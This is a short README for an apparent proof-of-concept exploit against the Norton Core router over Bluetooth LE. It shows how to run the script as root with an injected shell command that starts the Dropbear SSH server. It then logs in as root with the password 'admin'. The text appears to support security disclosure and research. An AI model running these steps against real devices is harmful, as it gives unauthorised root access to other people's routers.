For more information read paper.
To demonstrate the exploitation, we will use:
- OS GNU/Linux;
- Bluetooth dongle adapter;
- BlueZ utility (for testing Bluetooth connection).
In order to use the script, we will need to set all dependencies in a advance:
$ pip install -r ./requirements.txtWith the help of BlueZ utilities, we should ensure Bluetooth is enabled and
functions properly.
-
Restart the router to provide access to the engineering page.
-
Start the PoC on behalf of the root user (required for operating with Bluetooth) with the command on executing as an argument:
$ ./ble_norton_core.py "/etc/init.d/dropbear start"After the script is successfully executed, we get access to the device via the SSH connection. We put
rootas a user andadminas password:$ ssh root@norton.core